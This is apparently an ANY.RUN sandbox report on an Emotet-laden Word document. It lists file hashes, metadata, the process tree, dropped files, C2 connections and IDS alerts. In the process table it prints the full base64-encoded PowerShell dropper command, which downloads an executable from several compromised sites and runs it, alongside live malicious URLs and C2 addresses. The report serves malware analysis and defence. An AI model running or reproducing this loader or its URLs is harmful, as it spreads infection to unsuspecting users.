Malware analysis Archivo_20190918_448857.doc Malicious activity

Add for printing

File name:	Archivo_20190918_448857.doc
Full analysis:	https://app.any.run/tasks/6196fedb-ee78-4642-8956-c081dce0fc0a
Verdict:	Malicious activity
Threats:	Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email. Malware Trends Tracker >>>
Analysis date:	September 19, 2019, 09:15:55
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:	macros macros-on-open emotet-doc emotet generated-doc trojan
Indicators:
MIME:	application/msword
File info:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Tasty Wooden Tuna Legacy Frozen, Subject: coherent, Author: Adolfo Quitzon, Comments: Forge, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 18 07:22:00 2019, Last Saved Time/Date: Wed Sep 18 07:22:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
MD5:	3A23D727A7E4ABCE313D3851FAF6CDC5
SHA1:	FF61B948D8531DD3F8CA39E504B900316FF59C95
SHA256:	3F5A2DDF0CE35DCBB69BC07A247923226B7F1554788E4D913156C4DF5587E0F7
SSDEEP:	6144:msqZiq86MofT1K82zw1qWKWPLkIp7NSU4jJntATfDnAvLipwwPCQ3cqB:msqZiq86MofT1K82zw1qWKEXp7NSU4Vc

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 180 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: 120 seconds
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 8.0.7601.17514 undefined
Adobe Acrobat Reader DC MUI (15.023.20070)
Adobe Flash Player 26 ActiveX (26.0.0.131)
Adobe Flash Player 26 NPAPI (26.0.0.131)
Adobe Flash Player 26 PPAPI (26.0.0.131)
Adobe Refresh Manager (1.8.0)
CCleaner (5.35)
FileZilla Client 3.36.0 (3.36.0)
Google Chrome (75.0.3770.100)
Google Update Helper (1.3.34.7)
Java 8 Update 92 (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.7.2 (4.7.03062)
Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Professional 2010 (14.0.6029.1000)
Microsoft Office Proof (English) 2010 (14.0.6029.1000)
Microsoft Office Proof (French) 2010 (14.0.6029.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
Microsoft Office Single Image 2010 (14.0.6029.1000)
Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
Mozilla Firefox 68.0.1 (x86 en-US) (68.0.1)
Notepad++ (32-bit x86) (7.5.1)
Opera 12.15 (12.15.1748)
Skype version 8.29 (8.29)
Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
VLC media player (2.2.6)
WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

Client LanguagePack Package
Client Refresh LanguagePack Package
CodecPack Basic Package
Foundation Package
IE Troubleshooters Package
InternetExplorer Optional Package
KB2534111
KB2999226
KB4019990
KB976902
LocalPack AU Package
LocalPack CA Package
LocalPack GB Package
LocalPack US Package
LocalPack ZA Package
ProfessionalEdition
UltimateEdition

Add for printing

MALICIOUS
- Application was dropped or rewritten from another process
  - 373.exe (PID: 2572)
  - 373.exe (PID: 4028)
  - 373.exe (PID: 3944)
  - 373.exe (PID: 2860)
  - easywindow.exe (PID: 3288)
  - easywindow.exe (PID: 2340)
  - easywindow.exe (PID: 2076)
  - easywindow.exe (PID: 3420)
- EMOTET was detected
  - easywindow.exe (PID: 2076)
- Changes the autorun value in the registry
  - easywindow.exe (PID: 2076)
- Emotet process was detected
  - 373.exe (PID: 2860)
- Connects to CnC server
  - easywindow.exe (PID: 2076)
SUSPICIOUS
- Executed via WMI
  - powershell.exe (PID: 2392)
- PowerShell script executed
  - powershell.exe (PID: 2392)
- Creates files in the user directory
  - powershell.exe (PID: 2392)
- Executable content was dropped or overwritten
  - powershell.exe (PID: 2392)
  - 373.exe (PID: 2860)
- Application launched itself
  - 373.exe (PID: 4028)
  - easywindow.exe (PID: 2340)
- Starts itself from another location
  - 373.exe (PID: 2860)
INFO
- Creates files in the user directory
  - WINWORD.EXE (PID: 3488)
- Reads Microsoft Office registry keys
  - WINWORD.EXE (PID: 3488)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.doc	\|	Microsoft Word document (54.2)
.doc	\|	Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title:	Tasty Wooden Tuna Legacy Frozen
Subject:	coherent
Author:	Adolfo Quitzon
Keywords:	-
Comments:	Forge
Template:	Normal.dotm
LastModifiedBy:	-
RevisionNumber:	1
Software:	Microsoft Office Word
TotalEditTime:	-
CreateDate:	2019:09:18 06:22:00
ModifyDate:	2019:09:18 06:22:00
Pages:	1
Words:	95
Characters:	547
Security:	None
CodePage:	Windows Latin 1 (Western European)
Company:	Lockman LLC
Lines:	4
Paragraphs:	1
CharCountWithSpaces:	641
AppVersion:	16
ScaleCrop:	No
LinksUpToDate:	No
SharedDoc:	No
HyperlinksChanged:	No
TitleOfParts:	-
HeadingPairs:	Title 1
Manager:	Reilly
CompObjUserTypeLen:	32
CompObjUserType:	Microsoft Word 97-2003 Document

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID	CMD	Path	Indicators	Parent process
3488	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Archivo_20190918_448857.doc"	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	—	explorer.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000
2392	powershell -encod JAB6AHoATAA5AHMAYwA3AFUAPQAnAG0AVwBiAEoATwA0ACcAOwAkAEMAbgAwAFAAcgB0ACAAPQAgACcAMwA3ADMAJwA7ACQAcwBLAHEAdwA0AHUAPQAnAEIAcwBJAGIAagBqAFMAdQAnADsAJABJAEMAMABmAFEAdgBGADUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEMAbgAwAFAAcgB0ACsAJwAuAGUAeABlACcAOwAkAEsAVgBoAGsAOABaAEIASgA9ACcAdQBaAEcANAA1AG8AMwAnADsAJAB3AG8AaQAzAFMAdQA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwBiAGoAJwArACcAZQBjAHQAJwApACAAbgBlAHQALgBXAGUAQgBjAGwAaQBFAG4AdAA7ACQAQwBXAGIAYQAzAHcARABzAD0AJwBoAHQAdABwADoALwAvAGQAaQByAHAAcgBvAHAAZQByAHQAaQBlAHMALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBmAGQAMQA0ADkAOQA5AC8AQABoAHQAdABwADoALwAvAHIAdQBuAC0AZwBlAHIAbQBhAG4AeQAuAGMAbwBtAC8AcwBjAHIAaQBwAHQAcwAvAGoAYwA4ADIAOAAyADAAOAAvAEAAaAB0AHQAcAA6AC8ALwBzAGEAeAB0AG8AcgBwAGgALgBuAGUAdAAvAEQATwBDAC8ANQBuAGQAcQBvAHYAMAAxADgALwBAAGgAdAB0AHAAcwA6AC8ALwBzAHUAawBoAHUAbQB2AGkAdABoAG8AbQBlAHMALgBjAG8AbQAvAHMAYQB0AGgAbwByAG4AYwBvAG4AZABvAHMALgBjAG8AbQAvAHUAYwB3AG4AYQA3ADkANAAvAEAAaAB0AHQAcAA6AC8ALwB2AGEAbgBzAGMAaABlAGUAcgBzAC4AYwBvAG0ALwBjAGcAaQAtAGIAaQBuAC8AZwBvAHIAcAA3AHYANAA1ADUAMwA3ADAALwAnAC4AIgBTAGAAcABsAEkAVAAiACgAJwBAACcAKQA7ACQAQwBUAE4ARAB0ADUAPQAnAGoATgB3AEoAYQAwACcAOwBmAG8AcgBlAGEAYwBoACgAJABqAFgASQBPAFIASAB0ACAAaQBuACAAJABDAFcAYgBhADMAdwBEAHMAKQB7AHQAcgB5AHsAJAB3AG8AaQAzAFMAdQAuACIAZABPAHcAYABOAGAATABvAGAAQQBkAGYASQBsAEUAIgAoACQAagBYAEkATwBSAEgAdAAsACAAJABJAEMAMABmAFEAdgBGADUAKQA7ACQAWABoAFIATwBRAHYAPQAnAEEAMQBuAGwAUABpADMAcgAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEkAQwAwAGYAUQB2AEYANQApAC4AIgBsAGUAYABOAGcAdABoACIAIAAtAGcAZQAgADMAMgA1ADgAMAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAGAAVABBAHIAVAAiACgAJABJAEMAMABmAFEAdgBGADUAKQA7ACQAUwBfAFIAegByAFQAPQAnAHcASwBpAGkAYQA1AHQAJwA7AGIAcgBlAGEAawA7ACQAaQBhAEQAUwBrAGIAPQAnAE4AQgAwAEUAVwBHAGoAQQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABJAEwAdABrADcARgBXAHcAPQAnAFIATQBzAGgARwB2AEcAJwA=	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe		wmiprvse.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2572	"C:\Users\admin\373.exe"	C:\Users\admin\373.exe	—	powershell.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Display Control Panel Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
3944	"C:\Users\admin\373.exe"	C:\Users\admin\373.exe	—	373.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Display Control Panel Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
4028	--92e680ed	C:\Users\admin\373.exe	—	373.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Display Control Panel Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2860	--92e680ed	C:\Users\admin\373.exe		373.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Display Control Panel Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2340	"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"	C:\Users\admin\AppData\Local\easywindow\easywindow.exe	—	373.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Display Control Panel Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
3288	"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"	C:\Users\admin\AppData\Local\easywindow\easywindow.exe	—	easywindow.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Display Control Panel Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
3420	--fd47f3b8	C:\Users\admin\AppData\Local\easywindow\easywindow.exe	—	easywindow.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Display Control Panel Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2076	--fd47f3b8	C:\Users\admin\AppData\Local\easywindow\easywindow.exe		easywindow.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Display Control Panel Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)

Add for printing

Total events

1 773

Read events

1 280

Write events

Delete events

Modification events

No data

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
3488	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\CVR9BB8.tmp.cvr		—
		MD5:—	SHA256:—
3488	WINWORD.EXE	C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm		pgc
		MD5:62F2DA178DD59EBA6B61EE250E55F925	SHA256:8CF938206B83D51659082A32A71F3A9F077217F5A2E07A98541350C60245A244
3488	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\869AA6E4.wmf		wmf
		MD5:9499AC1CEDCF5A00FF1974D190751493	SHA256:3249CD1277EBE77FCB01A1D6B967F9EC81A3F448899DB717DF5E31EBA9E67EF7
3488	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B66A7C0C.wmf		wmf
		MD5:8D27FDBA6D0B15833C6A887033EB70D0	SHA256:EA469BA9959017418932830AF1D0E5925D61D5E419C76BDB798ABBC56E930FE6
3488	WINWORD.EXE	C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd		tlb
		MD5:B583B236D1743C9F994D97B8ADCC43ED	SHA256:66C186D34800FFBE91EA7E27FC036374721737EF58F38ED64C161FACBA00DDCE
3488	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\24B4E2C0.wmf		wmf
		MD5:B667B3FB244B94063D87A02BE421BD9F	SHA256:F0B37E89CAB5FD1060C3847A2649BDA9540371F0C2B603724AE309D53BFE228F
3488	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3C85E418.wmf		wmf
		MD5:DCF7830468C52AF6B866D30FBC324EC4	SHA256:0CF419FA26580D5D4E3A194A78937F0202F5CEC30AE0C26084F9C7E877DBAB17
3488	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1FB599E6.wmf		wmf
		MD5:C08FB9E0018D2D09CDFF18316C34DFD8	SHA256:F0929DFB4F259B008B3F1A86C63F3F5DB70E1EABA54F410F49FEEE6849331CC5
3488	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\35E66462.wmf		wmf
		MD5:661C90A9330AC94D46B5F57F029D64F0	SHA256:BC223C024BFD0EC33DE62B16CFA24C06CAE7ED9EA91FBE653E6ED5F54909A752
3488	WINWORD.EXE	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\170016CE.wmf		wmf
		MD5:AE96C6A21A14D4E581D00D4AAC418DD1	SHA256:64B5B547FCA97E575DDFF7A7D4B3D044E872EC1CF064F61182A2F0AB83A0B56D

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
2392	powershell.exe	GET	200	173.254.28.118:80	http://dirproperties.com/cgi-sys/suspendedpage.cgi	US	html	7.41 Kb	suspicious
2392	powershell.exe	GET	302	173.254.28.118:80	http://dirproperties.com/cgi-bin/fd14999/	US	html	301 b	suspicious
2392	powershell.exe	GET	406	93.191.156.116:80	http://saxtorph.net/DOC/5ndqov018/	DK	html	221 b	suspicious
2392	powershell.exe	GET	200	81.169.145.69:80	http://run-germany.com/scripts/jc828208/	DE	html	4.56 Kb	malicious
2076	easywindow.exe	POST	200	114.79.134.129:443	http://114.79.134.129:443/free/img/ringin/merge/	IN	binary	132 b	malicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
2076	easywindow.exe	114.79.134.129:443	—	D-Vois Broadband Pvt Ltd	IN	malicious
2392	powershell.exe	93.191.156.116:80	saxtorph.net	Zitcom A/S	DK	suspicious
2392	powershell.exe	81.169.145.69:80	run-germany.com	Strato AG	DE	malicious
2392	powershell.exe	173.254.28.118:80	dirproperties.com	Unified Layer	US	suspicious
2392	powershell.exe	45.120.148.57:443	sukhumvithomes.com	A2 Hosting, Inc.	SG	suspicious

DNS requests

Domain	IP	Reputation
dirproperties.com	173.254.28.118	suspicious
run-germany.com	81.169.145.69	malicious
saxtorph.net	93.191.156.116	suspicious
sukhumvithomes.com	45.120.148.57	suspicious

Threats

PID	Process	Class	Message
2076	easywindow.exe	A Network Trojan was detected	AV TROJAN W32/Emotet CnC Checkin (Apr 2019)
2076	easywindow.exe	A Network Trojan was detected	MALWARE [PTsecurity] Feodo/Emotet
2076	easywindow.exe	Potentially Bad Traffic	ET POLICY HTTP traffic on port 443 (POST)

4 ETPRO signatures available at the full report

Add for printing

No debug info

General Info

Archivo_20190918_448857.doc

3A23D727A7E4ABCE313D3851FAF6CDC5

FF61B948D8531DD3F8CA39E504B900316FF59C95

3F5A2DDF0CE35DCBB69BC07A247923226B7F1554788E4D913156C4DF5587E0F7

6144:msqZiq86MofT1K82zw1qWKWPLkIp7NSU4jJntATfDnAvLipwwPCQ3cqB:msqZiq86MofT1K82zw1qWKEXp7NSU4Vc

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Application was dropped or rewritten from another process

EMOTET was detected

Changes the autorun value in the registry

Emotet process was detected

Connects to CnC server

SUSPICIOUS

Executed via WMI

PowerShell script executed

Creates files in the user directory

Executable content was dropped or overwritten

Application launched itself

Starts itself from another location

INFO

Creates files in the user directory

Reads Microsoft Office registry keys

Malware configuration

Static information

TRiD

EXIF

FlashPix

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Information

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings